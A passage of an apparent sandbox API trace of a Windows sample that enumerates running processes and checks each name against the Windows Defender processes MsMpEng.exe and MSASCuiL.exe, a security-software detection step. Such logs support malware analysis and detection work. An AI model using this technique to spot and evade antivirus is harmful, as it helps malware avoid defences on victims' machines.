(lpString1="expressionmed.exe", lpString2="MsMpEng.exe") returned -1 [0119.879] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inclusive.exe")) returned 1 [0119.880] lstrcmpiW (lpString1="inclusive.exe", lpString2="MsMpEng.exe") returned -1 [0119.880] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x740, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovation-painful-resulting.exe")) returned 1 [0119.883] lstrcmpiW (lpString1="innovation-painful-resulting.exe", lpString2="MsMpEng.exe") returned -1 [0119.883] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="political-guide.exe")) returned 1 [0119.884] lstrcmpiW (lpString1="political-guide.exe", lpString2="MsMpEng.exe") returned 1 [0119.884] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blvd.exe")) returned 1 [0119.885] lstrcmpiW (lpString1="blvd.exe", lpString2="MsMpEng.exe") returned -1 [0119.885] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mails_users.exe")) returned 1 [0119.885] lstrcmpiW (lpString1="mails_users.exe", lpString2="MsMpEng.exe") returned -1 [0119.885] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trading.exe")) returned 1 [0119.886] lstrcmpiW (lpString1="trading.exe", lpString2="MsMpEng.exe") returned 1 [0119.886] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="declare.exe")) returned 1 [0119.887] lstrcmpiW (lpString1="declare.exe", lpString2="MsMpEng.exe") returned -1 [0119.887] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sake_psp.exe")) returned 1 [0119.888] lstrcmpiW (lpString1="sake_psp.exe", lpString2="MsMpEng.exe") returned 1 [0119.888] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="renewable-loss-purpose.exe")) returned 1 [0119.889] lstrcmpiW (lpString1="renewable-loss-purpose.exe", lpString2="MsMpEng.exe") returned 1 [0119.889] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation large.exe")) returned 1 [0119.890] lstrcmpiW (lpString1="nation large.exe", lpString2="MsMpEng.exe") returned 1 [0119.890] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conflicts_thermal_himself.exe")) returned 1 [0119.890] lstrcmpiW (lpString1="conflicts_thermal_himself.exe", lpString2="MsMpEng.exe") returned -1 [0119.890] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wonder_transmit_petersburg.exe")) returned 1 [0119.891] lstrcmpiW (lpString1="wonder_transmit_petersburg.exe", lpString2="MsMpEng.exe") returned 1 [0119.891] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0119.892] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MsMpEng.exe") returned 1 [0119.892] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.893] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0119.893] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0119.894] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MsMpEng.exe") returned 1 [0119.894] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0119.894] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MsMpEng.exe") returned 1 [0119.895] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.895] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0119.895] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa80, pcPriClassBase=8, dwFlags=0x0, szExeFile="tmp6149.exe")) returned 1 [0119.975] lstrcmpiW (lpString1="tmp6149.exe", lpString2="MsMpEng.exe") returned 1 [0119.975] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x698, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0119.976] lstrcmpiW (lpString1="cmd.exe", lpString2="MsMpEng.exe") returned -1 [0119.976] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x698, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0119.976] lstrcmpiW (lpString1="cmd.exe", lpString2="MsMpEng.exe") returned -1 [0119.976] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x698, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0119.977] CloseHandle (hObject=0x12c) returned 1 [0119.977] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x128 [0119.981] Process32FirstW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.981] lstrcmpiW (lpString1="[System Process]", lpString2="MSASCuiL.exe") returned -1 [0119.981] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0119.982] lstrcmpiW (lpString1="System", lpString2="MSASCuiL.exe") returned 1 [0119.982] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0119.983] lstrcmpiW (lpString1="smss.exe", lpString2="MSASCuiL.exe") returned 1 [0119.983] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.983] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCuiL.exe") returned -1 [0119.983] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0119.984] lstrcmpiW (lpString1="wininit.exe", lpString2="MSASCuiL.exe") returned 1 [0119.984] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.984] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCuiL.exe") returned -1 [0119.984] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0119.985] lstrcmpiW (lpString1="winlogon.exe", lpString2="MSASCuiL.exe") returned 1 [0119.985] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0119.985] lstrcmpiW (lpString1="services.exe", lpString2="MSASCuiL.exe") returned 1 [0119.985] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0119.986] lstrcmpiW (lpString1="lsass.exe", lpString2="MSASCuiL.exe") returned -1 [0119.986] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0119.986] lstrcmpiW (lpString1="lsm.exe", lpString2="MSASCuiL.exe") returned -1 [0119.987] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.987] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0119.987] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.988] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0119.988] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.989] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0119.989] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.990] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0119.990] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.991] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0119.991] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0119.992] lstrcmpiW (lpString1="audiodg.exe", lpString2="MSASCuiL.exe") returned -1 [0119.992] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.993] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0119.993] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0119.994] lstrcmpiW (lpString1="explorer.exe", lpString2="MSASCuiL.exe") returned -1 [0119.994] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0119.995] lstrcmpiW (lpString1="dwm.exe", lpString2="MSASCuiL.exe") returned -1 [0119.995] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.995] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0119.996] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0119.996] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MSASCuiL.exe") returned 1 [0119.996] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.997] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCuiL.exe") returned 1 [0119.997] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.998] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0119.998] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0119.999] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MSASCuiL.exe") returned 1 [0119.999] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0120.000] lstrcmpiW (lpString1="taskeng.exe", lpString2="MSASCuiL.exe") returned 1 [0120.000] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0120.001] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MSASCuiL.exe") returned 1 [0120.001] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0120.002] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCuiL.exe") returned 1 [0120.002] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="measurements-cocktail-motivation.exe")) returned 1 [0120.002] lstrcmpiW (lpString1="measurements-cocktail-motivation.exe", lpString2="MSASCuiL.exe") returned -1 [0120.003] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x578, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur_travelling_usage.exe")) returned 1 [0120.003] lstrcmpiW (lpString1="arthur_travelling_usage.exe", lpString2="MSASCuiL.exe") returned -1 [0120.003] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zdnet.exe")) returned 1 [0120.004] lstrcmpiW (lpString1="zdnet.exe", lpString2="MSASCuiL.exe") returned 1 [0120.004] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zufilmenyc.exe")) returned 1 [0120.005] lstrcmpiW (lpString1="zufilmenyc.exe", lpString2="MSASCuiL.exe") returned 1 [0120.005] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bangbus.exe")) returned 1 [0120.013] lstrcmpiW (lpString1="bangbus.exe", lpString2="MSASCuiL.exe") returned -1 [0120.013] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dee_flour.exe")) returned 1 [0120.014] lstrcmpiW (lpString1="dee_flour.exe", lpString2="MSASCuiL.exe") returned -1 [0120.014] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="expressionmed.exe")) returned 1 [0120.015] lstrcmpiW (lpString1="expressionmed.exe", lpString2="MSASCuiL.exe") returned -1 [0120.015] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inclusive.exe")) returned 1 [0120.016] lstrcmpiW (lpString1="inclusive.exe", lpString2="MSASCuiL.exe") returned -1 [0120.016] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x740, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovation-painful-resulting.exe")) returned 1 [0120.016] lstrcmpiW (lpString1="innovation-painful-resulting.exe", lpString2="MSASCuiL.exe") returned -1 [0120.016] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="political-guide.exe")) returned 1 [0120.017] lstrcmpiW (lpString1="political-guide.exe", lpString2="MSASCuiL.exe") returned 1 [0120.017] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blvd.exe")) returned 1 [0120.018] lstrcmpiW (lpString1="blvd.exe", lpString2="MSASCuiL.exe") returned -1 [0120.018] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mails_users.exe")) returned 1 [0120.019] lstrcmpiW (lpString1="mails_users.exe", lpString2="MSASCuiL.exe") returned -1 [0120.019] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trading.exe")) returned 1 [0120.020] lstrcmpiW (lpString1="trading.exe", lpString2="MSASCuiL.exe") returned 1 [0120.020] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="declare.exe")) returned 1 [0120.021] lstrcmpiW (lpString1="declare.exe", lpString2="MSASCuiL.exe") returned -1 [0120.021] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sake_psp.exe")) returned 1 [0120.022] lstrcmpiW (lpString1="sake_psp.exe", lpString2="MSASCuiL.exe") returned 1 [0120.022] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="renewable-loss-purpose.exe")) returned 1 [0120.023] lstrcmpiW (lpString1="renewable-loss-purpose.exe", lpString2="MSASCuiL.exe") returned 1 [0120.023] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation large.exe")) returned 1 [0120.023] lstrcmpiW (lpString1="nation large.exe", lpString2="MSASCuiL.exe") returned 1 [0120.023] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conflicts_thermal_himself.exe")) returned 1 [0120.024] lstrcmpiW (lpString1="conflicts_thermal_himself.exe", lpString2="MSASCuiL.exe") returned -1 